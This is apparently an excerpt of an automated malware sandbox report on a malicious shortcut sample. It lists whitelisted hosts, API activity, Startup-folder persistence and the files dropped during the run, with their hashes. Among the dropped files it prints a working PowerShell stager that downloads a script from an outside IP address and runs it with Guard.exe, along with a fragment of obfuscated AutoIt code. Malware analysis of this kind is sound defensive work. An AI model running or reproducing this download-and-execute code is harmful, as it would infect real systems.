                                                          • Excluded IPs from analysis (whitelisted): 23.36.245.152, 2.18.80.170, 23.32.239.9, 23.32.239.65, 2.19.198.16, 2.19.198.27, 2.19.198.10, 162.159.61.3, 172.64.41.3, 54.224.241.105, 18.213.11.84, 50.16.47.176, 34.237.241.83, 199.232.214.172, 23.192.153.142, 23.192.152.131, 2.19.198.17, 23.32.239.64, 2.19.198.8, 23.32.239.56, 23.32.239.10, 2.19.198.11, 23.32.239.74, 92.123.77.72, 2.19.195.9, 2.16.164.91, 2.16.164.112, 2.16.164.113, 23.32.239.57, 23.32.239.83, 23.32.239.66, 23.32.239.72, 23.32.239.58, 23.32.239.59, 23.32.239.80, 52.149.20.212, 3.219.243.226, 13.107.246.63
                                                          • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, e4578.dscb.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, fs.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, ssl.adobe.com.edgekey.net, armmf.adobe.com, geo2.adobe.com
                                                          • Execution Graph export aborted for target mshta.exe, PID 4412 because there are no executed function
                                                          • Execution Graph export aborted for target powershell.exe, PID 1260 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 4484 because it is empty
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          • VT rate limit hit for: R8CAg00Db8.lnk
                                                          Time | Type | Description
                                                          15:00:13 | API Interceptor | 2x Sleep call for process: svchost.exe modified
                                                          15:00:13 | API Interceptor | 1x Sleep call for process: mshta.exe modified
                                                          15:00:14 | API Interceptor | 110x Sleep call for process: powershell.exe modified
                                                          15:00:29 | API Interceptor | 2x Sleep call for process: AcroCEF.exe modified
                                                          15:01:15 | API Interceptor | 1631x Sleep call for process: Guard.exe modified
                                                          15:01:36 | API Interceptor | 468x Sleep call for process: SwiftWrite.pif modified
                                                          20:00:42 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1310720
                                                                              Entropy (8bit):1.3073280473701847
                                                                              Encrypted:false
                                                                              SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvri:KooCEYhgYEL0In
                                                                              MD5:345BC692C1B3203C326AC1E122590795
                                                                              SHA1:2BACC3FE6B8CD54955EA9FC2316F4C6C812CF23E
                                                                              SHA-256:07CEE50F7A06209CC52BAFCC5FF615102A809F204CD99262128E2861BD272622
                                                                              SHA-512:498DC03DC2D374757FC13B8AC2F3C277D006F97ACB37F1942365AC242060F79B1CF75FE24FCC77DE77B4FE904CD930F7BD8F82920A8AF0222DFFFB9BC12A8F90
                                                                              Malicious:false
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0xc8b94a48, page size 16384, DirtyShutdown, Windows version 10.0
                                                                              Category:dropped
                                                                              Size (bytes):1310720
                                                                              Entropy (8bit):0.42210846074852404
                                                                              Encrypted:false
                                                                              SSDEEP:1536:5SB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:5aza/vMUM2Uvz7DO
                                                                              MD5:98DD50424C953A3874AD6A0B037A1D7C
                                                                              SHA1:8F0A67B933FA856A0E4DD6C0BA34459A881B8028
                                                                              SHA-256:10D08956DB91BE03F99473E00D544C58935824170B31736A45613190423D99A4
                                                                              SHA-512:33B3E3B6DBB2A1978337A960BF9FE11334DDEDF56CCD7618DE8EE3ABAA0FECFC16E5D64B34D5A1C642372ADC0E8F5CF9C1ACE31ED402001549716FA5AC41AD90
                                                                              Malicious:false
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):16384
                                                                              Entropy (8bit):0.07498031055550482
                                                                              Encrypted:false
                                                                              SSDEEP:3:MW8YefO7ajn13a/ROXAllcVO/lnlZMxZNQl:MdzfO7a53qkXAOewk
                                                                              MD5:6417490B9A872B6A120E7133469919D2
                                                                              SHA1:F478984220FC4D180F15EF3E8DE6738E3DD1FCD0
                                                                              SHA-256:A4550F40BD12DFA22FB5864759AA1A6F0784544073447318077129EEA0A19F4D
                                                                              SHA-512:D1056F85D69A2EC6A99E69FEDA404C1E908A044C76A266595C781416D53E6D7A351E743459609A2E9AB8448B2261EE9FD27C16D65DB32C344A94821CD6D9D191
                                                                              Malicious:false
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):893608
                                                                              Entropy (8bit):6.62028134425878
                                                                              Encrypted:false
                                                                              SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                              MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                              SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                              SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                              SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                                              Joe Sandbox View:
                                                                              • Filename: s4PymYGgSh.lnk, Detection: malicious
                                                                              • Filename: PkContent.exe, Detection: malicious
                                                                              • Filename: PkContent.exe, Detection: malicious
                                                                              • Filename: ldqj18tn.exe, Detection: malicious
                                                                              • Filename: ldqj18tn.exe, Detection: malicious
                                                                              • Filename: EO3RT0fEfb.exe, Detection: malicious
                                                                              • Filename: RMBOriPHVJ.exe, Detection: malicious
                                                                              • Filename: S6x3K8vzCA.exe, Detection: malicious
                                                                              • Filename: PPbimZI4LV.exe, Detection: malicious
                                                                              • Filename: l5VhEpwzJy.exe, Detection: malicious
                                                                              Process:C:\Users\user\AppData\Roaming\PefjSkkhb.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):486
                                                                              Entropy (8bit):5.264402695461477
                                                                              Encrypted:false
                                                                              SSDEEP:12:f73/oomFEoFnV/9LBzFj0zUQbnRS6SxJMnCPTFM:f73/UCknZ9LzjYnRSb8Cba
                                                                              MD5:AA25D3FDAD1F106B38D0FC6EF7812219
                                                                              SHA1:1811C03BBAD3B7ED95835D4CC6D43C664C1B4A5B
                                                                              SHA-256:6CC303DD32C6F3629ACD59CFB6219D30D504AC12BBA0AFD87F38012E211496E0
                                                                              SHA-512:ED1809238957DAF71ADB4F3D0996D9CD51431AC0FB04180F4FEB5A4FE51CF07F95F935D8F56863B019AFAB737E03BE5E2E687FEB8C0416F4E470E40A282EC566
                                                                              Malicious:true
                                                                              Preview:
                                                                              [string]$fU5L = "http://139.99.188.124/QWCheljD.txt"
                                                                              [string]$oF6L = "C:\Users\Public\Secure.au3"
                                                                              [string]$exePath = "C:\Users\Public\Guard.exe"

                                                                              # Download the content from the URL
                                                                              $wResp = New-Object System.Net.WebClient
                                                                              $fCont = $wResp.DownloadString($fU5L)

                                                                              # Save the downloaded content to the output file
                                                                              Set-Content -Path $oF6L -Value $fCont -Encoding UTF8

                                                                              # Run the executable with the output file as an argument
                                                                              Start-Process -FilePath $exePath -ArgumentList $oF6L
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (1266)
                                                                              Category:dropped
                                                                              Size (bytes):1240103
                                                                              Entropy (8bit):5.144317310151777
                                                                              Encrypted:false
                                                                              SSDEEP:12288:28V+jcfSgyuH7Kixj+UXk8pL6OvsEmeXBWD4LkPq0e718m3UDd:qcB7HxicaEmEQD3I1jUZ
                                                                              MD5:5FD6DCD6015C6F3F00D18BE2CE75691F
                                                                              SHA1:63007CCA9ED6C2A903AA30B6FA00EB280D4879A2
                                                                              SHA-256:044C72C01C72338F3559D098BEBF9D251F911B9FF41DD958EB80D8F7C9583C31
                                                                              SHA-512:29DFDE6DBE2BDA1F6FBC7FACD06B9F66BED01BC5C01ECEFC6C35DE0A49D905869ADFFBC89B9934650CC6D28C3F0377FC6BE4CE25F92D54646A909DFAD7282219
                                                                              Malicious:true
                                                                              Preview:.Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:ASCII text
                                                                              Category:dropped
                                                                              Size (bytes):292
                                                                              Entropy (8bit):5.19566503652455
                                                                              Encrypted:false
                                                                              SSDEEP:6:7PQcEdSQ+q2Pwkn2nKuAl9OmbnIFUt8OPQcwgZmw+OPQcwQVkwOwkn2nKuAl9Omt:7oc0OvYfHAahFUt8OocZ/+Oocz5JfHAR
                                                                              MD5:A77AFB1B3C67D5238862985000C44D4A
                                                                              SHA1:0234888CCAD223F43D7DCDDCA594BD42EA7705F1
                                                                              SHA-256:5E833A3756FAE064B03A3571F4011B5FF4DA0E2A884409155EE6CC57F1870E4C
                                                                              SHA-512:099AEAEF7C40A9B500AA4AC787212D018E64F2F2B72E9A3C0083B386072A532C331A451F77E9E97B69F49D7E8ED89328E1C47E0BCCC35A121B586F0F5AA6AEFC
                                                                              Malicious:false
                                                                              Preview:2024/12/18-15:00:18.570 1d08 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/18-15:00:18.573 1d08 Recovering log #3.2024/12/18-15:00:18.573 1d08 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:ASCII text
                                                                              Category:dropped
                                                                              Size (bytes):336
                                                                              Entropy (8bit):5.197935109573059
                                                                              Encrypted:false
                                                                              SSDEEP:6:7PQcY+q2Pwkn2nKuAl9Ombzo2jMGIFUt8OPQcHZmw+OPQcnVkwOwkn2nKuAl9OmT:7octvYfHAa8uFUt8OocH/+OocV5JfHAv
                                                                              MD5:769329A20F8B6A291227EBCC35EE458C
                                                                              SHA1:CFF64F0AD3598FEF6156ABD4C6534EA74659CA9E
                                                                              SHA-256:64BA4D32C7229EC0E30F9AC4955DE342DE3836BAEA050C4CFE6C0E4E67FA1A2C
                                                                              SHA-512:0C23C932A0101ED329600992C8A9021DF34B1A60A10D3932E1D4484184E92A4F7AC594C5DB12D3B06964FE96D08CD2525BE823629E8E7BB08D738FFC3248863A
                                                                              Malicious:false
                                                                              Preview:2024/12/18-15:00:18.706 1d98 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/18-15:00:18.710 1d98 Recovering log #3.2024/12/18-15:00:18.710 1d98 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):475
                                                                              Entropy (8bit):4.967403857886107
                                                                              Encrypted:false
                                                                              SSDEEP:12:YH/um3RA8sqLsBdOg2HHfcaq3QYiubInP7E4TX:Y2sRdsVdMHO3QYhbG7n7
                                                                              MD5:B7761633048D74E3C02F61AD04E00147
                                                                              SHA1:72A2D446DF757BAEA2C7A58C050925976E4C9372
                                                                              SHA-256:1A468796D744FCA806D1F828C07E0064AB6A1FA0E31DA3A403F12B9B89868B67
                                                                              SHA-512:397A10C510FAA048E4AAB08A11B2AE14A09EE47EC4F5A2B47CE1A9580C2874ADE0F9F8FC287B9358C0FFEA4C89F8AB9270B9CA00064EA90CD2EF0EAD0A59369F
                                                                              Malicious:false
                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340980889952523","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146406},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:JSON data
                                                                              Category:modified
                                                                              Size (bytes):475
                                                                              Entropy (8bit):4.9729052853641855
                                                                              Encrypted:false
                                                                              SSDEEP:12:YH/um3RA8sqAtsBdOg2H9OCcaq3QYiubInP7E4TX:Y2sRdspOdMHwN3QYhbG7n7
                                                                              MD5:F3961DD88A10768D06D13110951FF10E
                                                                              SHA1:6EAB7622C51BF9519483A04F2B1373827519A47E
                                                                              SHA-256:A0B74E21B2C2D0E8D17718D804A5ACF5323AB7048DE38AB589A1BA8D94963A8E
                                                                              SHA-512:5B83804182BCB613D786B00AFA695756F776ACDA80C3B59499D662D606870C31A1930997220AC32AFCFA39D7E5E8801E2DCFB4742B6218AA193631B24D663C68
                                                                              Malicious:false
                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379112027780575","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":631241},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):4320
                                                                              Entropy (8bit):5.258280338309441
                                                                              Encrypted:false
                                                                              SSDEEP:96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo7gUjw/:etJCV4FiN/jTN/2r8Mta02fEhgO73go4
                                                                              MD5:9C837F09BC901AF489318040F1B8FE17
                                                                              SHA1:4903CA5A5CD0ED7E27D2E21E69C8208CF25554DF
                                                                              SHA-256:1708985407453F508B317E66E0BA17B4C38047C919AF7C3CC4F7219831341B78
                                                                              SHA-512:0B1DACDDA8CAB1B6E261461D99B3871525E58EF53E944C0DC9086805302ACE64F4A2C6178D28C13139392D24E90ACFFD43D8DF16BDB4AC6DE8C7A79E0F5676ED
                                                                              Malicious:false
                                                                              Preview:*...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:ASCII text
                                                                              Category:dropped
                                                                              Size (bytes):324
                                                                              Entropy (8bit):5.183654564518119
                                                                              Encrypted:false
                                                                              SSDEEP:6:7PQcIx3+q2Pwkn2nKuAl9OmbzNMxIFUt8OPQct5Zmw+OPQcttVkwOwkn2nKuAl9c:7ocIsvYfHAa8jFUt8Ooct5/+OoctT5JH
                                                                              MD5:DE7EE5085CF1E2EF7D477800353A9EAA
                                                                              SHA1:F6E2DD6037E0F64EA93E1F5B66B688F65DB46818
                                                                              SHA-256:14EA582F29F5D04C1DD46D4968F381139FD0E09CEE022F1247B679C0612957CA
                                                                              SHA-512:59F4F0963AF68D119AA787A91FE51B4D22C7797DD21CDF54A56D392947E12865FD9A9AECE900ACCE7F9C8159F1A7F7D4B527DFB7B5A47F5BBF2B7BD9B54E3BAC
                                                                              Malicious:false
                                                                              Preview:2024/12/18-15:00:18.799 1d98 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/18-15:00:18.800 1d98 Recovering log #3.2024/12/18-15:00:18.800 1d98 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                              Category:dropped
                                                                              Size (bytes):65110
                                                                              Entropy (8bit):1.1217569600910675
                                                                              Encrypted:false
                                                                              SSDEEP:96:IMMNvEzMMT9M7ziVkMM1MMMMMMMMxMMM2MMM9MAMMBvMMneMMMzMMMMzMMMOfMQn:TOY
                                                                              MD5:4B9C650BD0BCA8ECB718BF230E45A493
                                                                              SHA1:8B7C0D60AC3B7CEB8E21C81736F9153A3B835ED7
                                                                              SHA-256:88A9087C40E02862B1FBB69BB995341B2F1DDBF91C527BC3552012400FFC16E3
                                                                              SHA-512:FF4892383ABE6645FB6983143B549C9548121B2C206DEFF54AE92C49EF9BC90AA6EFCD33B1F8EBBCFE171888B15E0C5A1F9A2677DE7F7743A0B4695059793998
                                                                              Malicious:false
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                                              Category:dropped
                                                                              Size (bytes):86016
                                                                              Entropy (8bit):4.444952385086047
                                                                              Encrypted:false
                                                                              SSDEEP:384:yezci5tOiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:rhs3OazzU89UTTgUL
                                                                              MD5:5CC6C3C67173423B8666F96E02BC10A0
                                                                              SHA1:3E40B9EFBAACE254BCF3FADE8C783FBF2DD45230
                                                                              SHA-256:822DC333BB52E7EDD97C1E0E97293C097812CD40E1EEE22442B76948505AE27C
                                                                              SHA-512:3AB75F71E022EDC51432AC7AC628B27C4C77E962F85FCFA76303D832A8941F2FEF9D149DE194D458AD4C806E946B8748142532AA59CB7ACA98F12F1885DD8C88
                                                                              Malicious:false
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:SQLite Rollback Journal
                                                                              Category:dropped
                                                                              Size (bytes):8720
                                                                              Entropy (8bit):3.774245922868084
                                                                              Encrypted:false
                                                                              SSDEEP:48:7Mtp/E2ioyVkioy9oWoy1Cwoy1sKOioy1noy1AYoy1Wioy1hioybioyyoy1noy1m:7GpjukFjXKQPNLb9IVXEBodRBkg
                                                                              MD5:7EAC1425DA6BE3F944EBB71D3F5A25D0
                                                                              SHA1:50B628DDFDB1CF0935915D5B05FC83417FED0212
                                                                              SHA-256:6BEB5ECD8F655225AC62D5515FC00DFD839451BB5994E28209FDE10557E8C16E
                                                                              SHA-512:212F87E6E1158915C7D970471C104B950DFF92E0A9BCFE57483EB31C6E7B5F891EC30F61CAE3D6A3152E6D09861AF2F5CC0B509E765682EBD974244B16D23406
                                                                              Malicious:false
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:Certificate, Version=3
                                                                              Category:dropped
                                                                              Size (bytes):1391
                                                                              Entropy (8bit):7.705940075877404
                                                                              Encrypted:false
                                                                              SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                              MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                              SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                              SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                              SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                              Malicious:false
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                              Category:dropped
                                                                              Size (bytes):71954
                                                                              Entropy (8bit):7.996617769952133
                                                                              Encrypted:true
                                                                              SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                              MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                              SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                              SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                              SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                              Malicious:false
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):192
                                                                              Entropy (8bit):2.7673182398396405
                                                                              Encrypted:false
                                                                              SSDEEP:3:kkFklNWOX+klfllXlE/HT8khhttNNX8RolJuRdxLlGB9lQRYwpDdt:kKPOrmT8Q3NMa8RdWBwRd
                                                                              MD5:CD5557CA251BAF39A484CB130E444D73
                                                                              SHA1:22CCF4A248BA7725EAA16C8D75D6877AA3DFC374
                                                                              SHA-256:4CA89A3BEC7A2910446F076E3317A3AC0B0E0431A8C5CE9676DC0593C394EAFE
                                                                              SHA-512:67FADB28A0769CB75BA3CD008AE00E0091052114C7CBCBD132F9474C4EBA9E1A43980F1726986CB62755057B1822FB628D0CA573734B9243F4F647CF27D0DF77
                                                                              Malicious:false
                                                                              Preview:p...... .........3.}.Q..(....................................................... ..........W....=s..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:data
                                                                              Category:modified
                                                                              Size (bytes):328
                                                                              Entropy (8bit):3.2539954282295116
                                                                              Encrypted:false
                                                                              SSDEEP:6:kKnc39UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:/cGDImsLNkPlE99SNxAhUe/3
                                                                              MD5:BB58AA2BA906D546CBFF369C6682ABF0
                                                                              SHA1:31F1C621AB8047F2F153A5EDB667B90560222FC3
                                                                              SHA-256:E405141899099A7FA87FDF482FFFB7C78882F906C110ED219AAD7935FDC73978
                                                                              SHA-512:C0E0C2C6A84BECD4F47F0FADFBD95CF133BB3D920B77868FC3C2A9AA79565903E6D7A3ECA4A182232651AA8B5721DA01216705DF0D0C8639EC7D954B73245B41
                                                                              Malicious:false
                                                                              Preview:p...... ..........!..Q..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:PostScript document text
                                                                              Category:dropped
                                                                              Size (bytes):1233
                                                                              Entropy (8bit):5.233980037532449
                                                                              Encrypted:false
                                                                              SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                              MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                              SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                              SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                              SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                              Malicious:false
                                                                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:PostScript document text
                                                                              Category:dropped
                                                                              Size (bytes):10880
                                                                              Entropy (8bit):5.214360287289079
                                                                              Encrypted:false
                                                                              SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                              MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                              SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                              SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
